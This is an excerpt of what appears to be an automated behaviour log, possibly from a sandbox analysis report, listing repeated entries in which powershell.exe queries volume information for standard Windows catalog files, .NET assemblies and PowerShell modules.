Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
